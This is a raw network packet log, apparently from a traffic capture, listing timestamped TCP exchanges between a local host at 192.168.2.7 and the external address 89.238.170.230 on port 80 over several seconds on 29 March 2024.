Mar 29, 2024 14:24:18.177047014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.177062035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.177088022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.177114010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.397862911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.397916079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.397929907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.397943020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.398032904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.398097992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.398113012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.610495090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.610521078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.610588074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.610625982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.610709906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.610758066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.843271971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.843292952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.843306065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.843319893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.843379021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.843421936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.038681030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.038804054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.068941116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.068958998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.069056988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.069108009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.069158077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.069158077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.255438089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.255564928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.288419008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.288489103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.288597107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.288650990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.288661003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.288712025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.476572990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.476613998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.476737022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.509919882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.509996891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.510143042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.510176897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.510248899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.695493937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.695580006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.695627928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.695880890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.727889061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.728023052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.728049994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.728102922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.728302956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.728358030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.728382111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.728423119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.945483923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.945503950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.945605040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:19.945683002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:19.945738077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.158123016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.158153057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.158196926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.158258915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.158293009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.158319950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.381026030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.381079912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.381098032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.381223917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.381561041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.381561041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.591094971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.591208935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.591293097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.591337919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.591339111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.591377020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.811394930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.811435938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:20.811542034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:20.811896086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.036108017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.036180973 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.036505938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.036521912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.036549091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.036571980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.254477024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.254502058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.254563093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.254637003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.254749060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.476778984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.476814985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.476829052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.476967096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.477018118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.697810888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.697860003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.697890043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.697912931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.698052883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.698098898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.922893047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.922920942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.922969103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.922975063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.922986984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.922995090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.923002005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:21.923015118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:21.923043013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.143165112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.143251896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.143465042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.143480062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.143492937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.143507004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.143515110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.143553972 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.365295887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.365382910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.365477085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.365492105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.365520954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.365560055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.580082893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.580157042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.580334902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.580349922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.580398083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.794524908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.794590950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:22.810745955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.810847044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:22.810965061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.009671926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.009886980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.024286985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.024301052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.024348974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.222016096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.222034931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.222135067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.236191034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.236206055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.236251116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.236277103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.419583082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.419683933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.419722080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.419764042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.432826042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.432881117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.432934046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.432981014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.432985067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.433017969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.625739098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.625833035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.625854015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.625902891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.639501095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.639559984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.639573097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.639600039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.639611959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.639650106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.839416027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.839494944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.854882002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.854928970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.854948997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.854969025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.855797052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.855811119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:23.855846882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:23.855846882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.051343918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.051424980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.068778038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.068842888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.069812059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.069849968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.069921017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.069957972 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.070019960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.070059061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.281764030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.281961918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.299441099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.299504995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.299894094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.299943924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.299989939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.300029039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.497478962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.497561932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.497667074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.497682095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.497701883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.497720003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.515223026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.515274048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.515391111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.515429974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.515469074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.515505075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.717998028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.718213081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.718275070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.718282938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.719012022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.733664036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.733736038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.733788967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.733800888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.733853102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.931957006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.931991100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.932064056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.932075977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.932133913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.932177067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.946576118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.946635008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.946695089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:24.946716070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:24.949567080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.138005972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.138030052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.138098955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.138119936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.138161898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.138166904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.141577005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.152575016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.152652979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.152719975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.155663967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.157561064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.354808092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.354928017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.354991913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.355000973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.355097055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.355143070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.358012915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.358058929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.368345022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.368422985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.368479013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.373536110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.373788118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.581465006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.581496954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.581556082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.581569910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.581581116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.581615925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.583911896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.583976030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.593698978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.593918085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.593982935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.597863913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.601589918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.808263063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.808327913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.808347940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.808388948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.809227943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.809283018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.809884071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.809933901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.810625076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.810669899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.810672045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.810709953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.822925091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.822946072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:25.822983980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:25.823004007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.022974968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.022989035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.023062944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.023492098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.023505926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.023546934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.023581028 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.024791002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.024821043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.024842024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.024858952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.025018930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.025068045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.035715103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.035777092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.035806894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.035846949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.226597071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.226640940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.226655006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.226681948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.226695061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.226736069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.227790117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.227803946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.227830887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.227845907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.228013039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.228054047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.228058100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.228096008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.237381935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.237430096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.237469912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.237515926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.435523987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.435540915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.435612917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.435621023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.435658932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.436292887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.436399937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.436418056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.436449051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.445123911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.445194960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.445246935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.445292950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.639441013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.639460087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.639537096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.639543056 CET	49699	80	192.168.2.7	89.238.170.230
